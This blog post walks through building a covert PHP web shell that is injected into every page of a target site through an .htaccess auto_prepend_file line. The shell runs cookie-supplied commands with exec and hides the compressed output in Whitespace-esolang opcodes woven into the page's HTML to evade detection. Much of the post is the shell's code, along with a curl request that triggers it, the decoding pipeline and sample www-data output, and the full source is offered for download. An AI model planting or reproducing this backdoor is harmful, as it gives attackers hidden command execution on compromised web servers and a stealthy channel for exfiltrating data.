Whitespace Esolang Covert Channel / Steganography

I’ve always been a fan of esoteric programming languages (esolangs). These languages are generally made just for fun, mostly in universities or for challenges. Wikipedia describes them as follows:

An esoteric programming language (esolang, in short) is a programming language designed to test the boundaries of computer programming language design, as a proof of concept, or as a joke. The use of esoteric distinguishes these languages from programming languages that working developers use to write software.

You’ve probably seen some of the famous ones, like Brainfuck and Shakespeare. Some months ago I stumbled upon a funny one called “Whitespace”.

About Whitespace esolang

Whitespace is an esolang created by Edwin Brady and Chris Morris at the University of Durham and released in 2003. Its opcodes consist only of spaces, tabs and line feeds. Interesting, huh?

Here’s a sample Hello, World! program in Whitespace (red = spaces, blue = tabs, black = VIM cursor):


This “feature” struck me as a pattern that would be very difficult to detect through computational means: since the language natively discards every other character, a Whitespace program can be merged arbitrarily with any other text... and even some code 😉

I then remembered that HTML is forgiving about repeated spaces, tabs and line feeds when it comes to parsing and rendering (in most contexts they collapse into a single space), so I should be able to inject Whitespace opcodes into HTML without breaking it and with only minor rendering quirks.

So the weather was crappy, the beer had run out, and I decided to build a covert shell with that.

Creating the covert shell

PHP is one of the most widely used languages on websites and powers popular platforms like WordPress and MediaWiki. PHP has an output buffering system (ob_start, ob_get_contents etc.) and a widely abused feature called auto_prepend_file. These would be enough to set up my covert shell.

I quickly created two files: one .htaccess to handle my shell injection via auto_prepend_file (an old and well-known trick) and one wcc.php to do the magic.

php_value auto_prepend_file "wcc.php"

This ensures my shell works on almost any PHP page on the target that is accessible through the browser.

The first thing I had to do was make sure I got the output buffer after all other possible output buffer handlers had processed it. It’s been quite a while since I left web development, but I did remember register_shutdown_function, which is used to, you know, register functions that will run when the script exits.

I could’ve stopped there, but I wanted to keep other shutdown functions from winning the race and altering the output after mine ran. So I did some research: shutdown functions run in the order they were registered, so if you call register_shutdown_function from inside a shutdown function, the new one lands at the end of the queue and has a high chance of being the last to run (unless another shutdown function pulls the same trick).

function wcc_init() {
	# ... snip ...

	# Register a shutdown function that registers another
	# shutdown function as the last in the chain ;)
	# (unless another shutdown function does the same)
	register_shutdown_function('wcc_shutdown', $cmd_output);
}//end :: wcc_init

And further down…

function wcc_shutdown($whitespace_payload) {
	register_shutdown_function('wcc_merge_output', $whitespace_payload); # register last ;)
}//end :: wcc_shutdown

That took care of ensuring that my wcc_merge_output function will run at the very end of any script.

Now it’s time to play with the output buffer and do the Whitespace magic. I placed the ob_start call in my wcc_init function, which lives in the file prepended via .htaccess, so output buffering is enabled as soon as the script starts.

If the magic cookie key is set, it runs the command with exec (for testing purposes; you can swap in whichever method you want), compresses the output with gzdeflate and converts the result to Whitespace.

I won’t go through the actual code responsible for converting ASCII to Whitespace, but FYI: it converts each character to binary, pushes each one onto the Whitespace stack, then adds a “print char from stack” instruction N times, where N = len(string), and finally adds the “end program” instruction.

You can read more about the internals of Whitespace Language on the official page’s tutorial. If you’re interested, you can check the wcc_whitespace_print_string function source-code.
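
As a rough illustration of that conversion, here is a minimal sketch based on the Whitespace instruction set: push is two spaces followed by a sign and binary digits (space = 0, tab = 1) terminated by a line feed, output-character is tab, line feed, space, space, and end-of-program is three line feeds. The function names are hypothetical (this is not the PoC's wcc_whitespace_print_string), and pushing the characters in reverse order so that they print front to back is my assumption about how the stack order is handled.

```php
<?php
// Hypothetical sketch, not the PoC's wcc_whitespace_print_string.

// Encode "push <n>" for a non-negative integer.
function sketch_ws_push(int $n): string {
    $digits = strtr(decbin($n), '01', " \t"); // 0 -> space, 1 -> tab
    // [space][space] = push, [space] = positive sign, digits, [LF] = end of number
    return "  " . " " . $digits . "\n";
}

// Build a Whitespace program that prints $text and then halts.
function sketch_ws_print_string(string $text): string {
    $program = '';
    // Assumption: push in reverse so the first character ends up on top of the stack.
    for ($i = strlen($text) - 1; $i >= 0; $i--) {
        $program .= sketch_ws_push(ord($text[$i]));
    }
    // [tab][LF][space][space] = pop the top of the stack and output it as a character
    $program .= str_repeat("\t\n  ", strlen($text));
    // [LF][LF][LF] = end program
    return $program . "\n\n\n";
}
```

In this scheme each payload byte costs up to 16 whitespace characters (12 for pushing an 8-bit value, 4 for printing it), which is a good reason to compress the command output before encoding it.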

The wcc_init function ended up looking like this:

function wcc_init() {
	if (
		!isset($_COOKIE[WCC_COOKIE_KEY])
		# ... snip (further checks elided in this excerpt) ...
	) return false;

	$cmd_output = wcc_exec($_COOKIE[WCC_COOKIE_KEY]);

	register_shutdown_function('wcc_shutdown', $cmd_output);

	return true;

}//end :: wcc_init

When the original script finishes its job and execution is passed to my shutdown function, wcc_merge_output grabs the contents of the output buffer, merges them with the Whitespace payload, prints the result and exits.

function wcc_merge_output($whitespace_payload) {

	$page_content = ob_get_contents();

	# "Sanitize" page content and tokenize
	# ... snip ...

	# Build Content
	$final_content = wcc_build_content($whitespace_tokens, $content_tokens);

	# Show content & exit
	print $final_content;

}//end :: wcc_merge_output

The caveat

Of course, nothing comes easy. I decided to test WCC on a real (if a little old) WordPress install, so I pulled up an old VM that had it installed.

My buffer was being ignored or duplicated, depending on the page. It turns out I had not accounted for the race condition that other code can introduce when handling the output buffer: it was flushing the buffer before I could act. So I created a little trap to keep others from messing with it.

# in script start
global $buffer;

# in wcc_init()
# this trap will be called when something
# tries to display the output buffer
ob_start('wcc_output_trap');

# Trap function added
# Someone tries to output the buffer before us
# and ... OMG! IT'S A TRAP!
function wcc_output_trap($current_buffer) {
    global $buffer;
    $buffer .= $current_buffer; # let's save it for later
    return ''; # prevents showing the buffer yet
}//end :: wcc_output_trap

# in wcc_merge_output()
$page_content = $buffer.ob_get_contents(); # now we can show everything

From the documentation for the callback parameter of ob_start:

The function will be called when the output buffer is flushed (sent) or cleaned (with ob_flush(), ob_clean() or similar function) or when the output buffer is flushed to the browser at the end of the request.

That did the trick.
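
To see the trap behave in isolation, here is a small self-contained sketch. It is not the PoC code: the function name and the closure-based accumulator are my own, and the "other code" flushing early is simulated with a plain ob_flush call.

```php
<?php
// Hypothetical demo of an ob_start callback that swallows early flushes.
function sketch_capture_despite_early_flush(): string {
    $saved = '';

    // The callback receives whatever is being flushed; returning '' means
    // nothing is actually sent, while we keep a copy for later.
    ob_start(function (string $chunk) use (&$saved): string {
        $saved .= $chunk;
        return '';
    });

    echo '<p>first</p>';
    ob_flush();               // someone tries to send the buffer before us
    echo '<p>second</p>';

    // Saved chunks plus whatever is still sitting in the buffer.
    $page = $saved . ob_get_contents();
    ob_end_clean();           // drop the buffer without emitting anything
    return $page;
}
```

Calling sketch_capture_despite_early_flush() returns both paragraphs in order, even though the first one was "flushed" before the second was written.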

The sanitization and tokenization process is quite simple.

For content, I first replace all tabs with spaces and place each line in an array indexed by its line number. Then I remove the line feed from each line and break the line into tokens separated by spaces.

For whitespace, I just convert a string to an array of characters. Dead simple.

Merging content

This is quite simple too. For each Whitespace token (character/opcode), I add one of the content parts (tokens) followed by the Whitespace token.

If the Whitespace payload is shorter than the content, once I finish adding Whitespace tokens I just add the remaining pieces glued together by spaces and keep their line feeds.

If the Whitespace payload is longer than the content, I just append the raw remainder of the payload to the end of the HTML content. This makes detection easier, but it’s better than no output at all. Just choose a page with more content.

You can check out the source code of this routine.
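
The tokenizing and merging steps above can be sketched roughly as follows. This is a simplified illustration, not the PoC's wcc_build_content: the function names are hypothetical, and it assumes the payload ends with the “end program” instruction so that any whitespace after it is ignored by the interpreter.

```php
<?php
// Hypothetical sketch of the tokenize and merge steps.

// Returns an array indexed by line number, each entry a list of tokens.
function sketch_tokenize_content(string $html): array {
    $lines = [];
    foreach (explode("\n", str_replace("\t", ' ', $html)) as $line) {
        // Split on runs of spaces and drop empty tokens.
        $lines[] = preg_split('/ +/', trim($line, " \r"), -1, PREG_SPLIT_NO_EMPTY);
    }
    return $lines;
}

function sketch_merge(string $payload, array $lines): string {
    $ops = $payload === '' ? [] : str_split($payload); // one opcode per character
    $total = count($ops);
    $used = 0;
    $out = '';
    foreach ($lines as $tokens) {
        foreach ($tokens as $i => $token) {
            $out .= $token;
            if ($used < $total) {
                $out .= $ops[$used++];   // an opcode takes the separator's place
            } elseif ($i < count($tokens) - 1) {
                $out .= ' ';             // payload done: plain space between tokens
            }
        }
        if ($used >= $total) {
            $out .= "\n";                // payload done: keep the original line feed
        }
    }
    // Payload larger than the page: append the rest raw.
    return $out . implode('', array_slice($ops, $used));
}
```

Stripping everything except spaces, tabs and line feeds from the merged output yields a string that starts with the original payload, which is all the interpreter needs.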

Issuing requests to the shell

In this PoC I used the classic trick of passing the command in a cookie.

define('WCC_COOKIE_KEY', 'wcc_cmd');

So from a shell, you can do something like this ($TARGET_URL stands for any PHP page on the target):

curl -s -H 'Cookie: wcc_cmd=id' -o out.html "$TARGET_URL"

Then parse with any Whitespace interpreter and inflate the payload again

./wspace out.html | head -n -3 | php inflate.php

inflate.php reads input from stdin and passes it to gzinflate.


= WCC = Command output ==========================

uid=33(www-data) gid=33(www-data) groups=33(www-data)
= WCC = EOF =====================================
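
If you don't have a Whitespace interpreter at hand, the recovery step can be approximated in PHP. The sketch below is not a full interpreter: it only understands the three instructions this kind of payload needs (push, output character, end program), and the function names are hypothetical. The second function plays the role of inflate.php.

```php
<?php
// Hypothetical client-side sketch: push, output-char and end-program only.
function sketch_ws_run(string $source): string {
    // Anything that is not a space, tab or line feed is a comment.
    $code = preg_replace('/[^ \t\n]/', '', $source);
    $stack = [];
    $output = '';
    $i = 0;
    $len = strlen($code);
    while ($i < $len) {
        if (substr($code, $i, 2) === "  ") {              // push number
            $negative = substr($code, $i + 2, 1) === "\t";
            $i += 3;
            $value = 0;
            while ($i < $len && $code[$i] !== "\n") {      // binary digits up to LF
                $value = $value * 2 + ($code[$i] === "\t" ? 1 : 0);
                $i++;
            }
            $i++;                                          // skip the terminating LF
            $stack[] = $negative ? -$value : $value;
        } elseif (substr($code, $i, 4) === "\t\n  ") {     // output top of stack as char
            if ($stack === []) {
                throw new RuntimeException('stack underflow');
            }
            $output .= chr(array_pop($stack) & 0xFF);
            $i += 4;
        } elseif (substr($code, $i, 3) === "\n\n\n") {     // end program
            return $output;
        } else {
            throw new RuntimeException("unsupported instruction at offset $i");
        }
    }
    return $output;
}

// Run the embedded program, then undo the gzdeflate step.
function sketch_recover(string $page): string {
    $plain = @gzinflate(sketch_ws_run($page));
    if ($plain === false) {
        throw new RuntimeException('payload is not raw DEFLATE data');
    }
    return $plain;
}
```

Something like sketch_recover(file_get_contents('out.html')) would then stand in for the interpreter plus inflate.php pipeline, as long as the page only carries these three instructions.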

Visual Differences

For some content you might get some quirks, for others, not.

Here’s a screenshot of both page sources. The first has the embedded Whitespace command output and the second is the original.

Whitespace HTML Source Comparison

Here’s a screenshot of both pages as rendered HTML. The first has the embedded Whitespace command output and the second is the original. (Don’t mind the images, this theme has random header images.)

Whitespace Rendered HTML Comparison

Size discrepancies

Since we’re mostly replacing existing whitespace rather than adding characters, the file size ends up very close to the original, as long as you have enough HTML to fit your command output. Below is a comparison of the original HTML with versions carrying the output of some commands.

I ran id, ip a show, ps aux and ls -al. id was the only one that fit entirely in the HTML I had (a pretty short page). The others resulted in raw Whitespace being appended to the end of the original HTML.

$ ls -al /tmp/{original,cmd*}.html
-rw-rw-r-- 1 jseidl jseidl 14778 Feb 18 20:47 /tmp/original.html
-rw-rw-r-- 1 jseidl jseidl 14191 Feb 18 20:36 /tmp/cmd_id.html
-rw-rw-r-- 1 jseidl jseidl 16986 Feb 18 20:50 /tmp/cmd_ip_a_show.html
-rw-rw-r-- 1 jseidl jseidl 19013 Feb 18 20:50 /tmp/cmd_ls_al.html
-rw-rw-r-- 1 jseidl jseidl 41000 Feb 18 20:50 /tmp/cmd_ps_aux.html

LOL. In some cases it even “minifies” a little…
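
Whether a given output will fit can be estimated before sending anything. The sketch below is a back-of-the-envelope check under two assumptions of mine: the payload is encoded with one push and one print instruction per byte plus a final end-program instruction, and every content token can carry exactly one opcode. The PoC's real numbers may differ, and the function names are hypothetical.

```php
<?php
// Hypothetical helpers for a rough "does it fit?" check.

// Whitespace characters needed to print $payload with push/print/end instructions.
function sketch_payload_cost(string $payload): int {
    $cost = 3;                                     // end program: [LF][LF][LF]
    for ($i = 0; $i < strlen($payload); $i++) {
        $bits = strlen(decbin(ord($payload[$i]))); // binary digits for this byte
        $cost += 2 + 1 + $bits + 1;                // push: opcode, sign, digits, LF
        $cost += 4;                                // print: [tab][LF][space][space]
    }
    return $cost;
}

// Number of content tokens, i.e. slots that can each carry one opcode.
function sketch_page_capacity(string $html): int {
    return count(preg_split('/[ \t\n]+/', $html, -1, PREG_SPLIT_NO_EMPTY));
}

function sketch_fits(string $payload, string $html): bool {
    return sketch_payload_cost($payload) <= sketch_page_capacity($html);
}
```

Note that $payload here is the compressed output, so longer commands such as ps aux need a page with far more tokens than a short one offers.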

Final notes

  • I did not put any effort into encoding/encrypting the cookie or commands or whatever. This is only to test the covert response channel.
  • I also know that cookie-based command passing is easily detectable, and there are many better ways to do that.
  • Of course there are better methods than exec to run code. This is also not the point of this research.

Source code & files

All files are available on my GitHub repo. Feel free to download, play, fork, whatever.